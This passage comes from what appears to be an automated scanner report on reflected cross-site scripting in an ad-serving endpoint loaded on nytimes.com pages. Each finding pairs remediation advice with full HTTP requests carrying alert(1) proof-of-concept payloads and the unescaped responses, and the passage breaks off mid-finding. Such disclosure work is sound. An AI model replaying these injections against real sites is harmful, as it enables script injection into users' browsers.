GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=&1c0fb'-alert(1)-'c291a30757=1 HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:53:39 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6759
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... .nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=&1c0fb'-alert(1)-'c291a30757=1http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa\"> ...[SNIP]...
3.19. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.vulnerable.ad.partner
Path: /adj/N5295.NewYorkTimes/B4885922
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be867"-alert(1)-"9ef92a9fab1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=&be867"-alert(1)-"9ef92a9fab1=1 HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:53:34 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6763
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... .nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=&be867"-alert(1)-"9ef92a9fab1=1http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg ...[SNIP]...
3.20. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [opzn&page parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.vulnerable.ad.partner
Path: /adj/N5295.NewYorkTimes/B4885922
Issue detail
The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93369"-alert(1)-"a86203937ad was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html93369"-alert(1)-"a86203937ad&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:49:14 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6751
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 88564%3B3454-728/90%3B38010000/38027757/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt148715_248116%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html93369"-alert(1)-"a86203937ad&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?bran ...[SNIP]...
3.21. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [opzn&page parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.vulnerable.ad.partner
Path: /adj/N5295.NewYorkTimes/B4885922
Issue detail
The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 973ee'-alert(1)-'aef67755056 was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html973ee'-alert(1)-'aef67755056&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:49:18 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6751
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 88564%3B3454-728/90%3B38010000/38027757/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt148715_248116%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html973ee'-alert(1)-'aef67755056&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?bran ...[SNIP]...
3.22. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [pos parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.vulnerable.ad.partner
Path: /adj/N5295.NewYorkTimes/B4885922
Issue detail
The value of the pos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f43c6"-alert(1)-"f1d869cb71d was submitted in the pos parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAdf43c6"-alert(1)-"f1d869cb71d&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:49:47 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6751
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 54-728/90%3B38010000/38027757/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt148715_248116%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAdf43c6"-alert(1)-"f1d869cb71d&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?brand=CHIH&utm ...[SNIP]...
3.23. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [pos parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.vulnerable.ad.partner
Path: /adj/N5295.NewYorkTimes/B4885922
Issue detail
The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33049'-alert(1)-'ef4c6349c56 was submitted in the pos parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd33049'-alert(1)-'ef4c6349c56&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:49:52 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6751
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 54-728/90%3B38010000/38027757/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt148715_248116%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd33049'-alert(1)-'ef4c6349c56&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?brand=CHIH&utm ...[SNIP]...
3.24. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sn1 parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.vulnerable.ad.partner
Path: /adj/N5295.NewYorkTimes/B4885922
Issue detail
The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dfd08'-alert(1)-'a8a71a52983 was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438fdfd08'-alert(1)-'a8a71a52983&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:52:33 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6751
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... age=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438fdfd08'-alert(1)-'a8a71a52983&goto=http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa\"> ...[SNIP]...
3.25. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sn1 parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.vulnerable.ad.partner
Path: /adj/N5295.NewYorkTimes/B4885922
Issue detail
The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 304c3"-alert(1)-"820c38f512d was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f304c3"-alert(1)-"820c38f512d&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:52:27 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6751
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... age=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f304c3"-alert(1)-"820c38f512d&goto=http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; va ...[SNIP]...
3.26. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sn2 parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.vulnerable.ad.partner
Path: /adj/N5295.NewYorkTimes/B4885922
Issue detail
The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd88d'-alert(1)-'c98da69b678 was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476fd88d'-alert(1)-'c98da69b678&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:51:10 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6751
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... w.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476fd88d'-alert(1)-'c98da69b678&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa\"> ...[SNIP]...
3.27. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [sn2 parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.vulnerable.ad.partner
Path: /adj/N5295.NewYorkTimes/B4885922
Issue detail
The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55441"-alert(1)-"1ff26f2efc9 was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/4352347655441"-alert(1)-"1ff26f2efc9&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:51:05 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6751
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... w.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/4352347655441"-alert(1)-"1ff26f2efc9&snr=doubleclick&snx=1289611278&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa"); var fscUrl = url; var fs ...[SNIP]...
3.28. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [snr parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.vulnerable.ad.partner
Path: /adj/N5295.NewYorkTimes/B4885922
Issue detail
The value of the snr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39ddd'-alert(1)-'49ddae20877 was submitted in the snr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5295.NewYorkTimes/B4885922;sz=728x90;pc=nyt148715_248116;ord=2010.11.13.01.44.38;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick39ddd'-alert(1)-'49ddae20877&snx=1289611278&sn1=14ef8a3c/571d438f&goto= HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/gst/mostpopular.html?src=hp1-0-M Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ad.vulnerable.ad.partner Proxy-Connection: Keep-Alive Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sat, 13 Nov 2010 01:51:34 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6751
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... x/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/gst/mostpopular.html&pos=TopAd&camp=Google_ChromeUSq410-1554601-nyt2&ad=Google_ChromeUSq410.ROS.dart728x90&sn2=85b28166/43523476&snr=doubleclick39ddd'-alert(1)-'49ddae20877&snx=1289611278&sn1=14ef8a3c/571d438f&goto=http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.NewYorkTimes&utm_medium=oa\"> ...[SNIP]...
3.29. http://ad.vulnerable.ad.partner/adj/N5295.NewYorkTimes/B4885922 [snr parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.vulnerable.ad.partner
Path: /adj/N5295.NewYorkTimes/B4885922
Issue detail
The value of the snr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 582d2"-alert(1)-"b947319b053 was submitted in the snr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
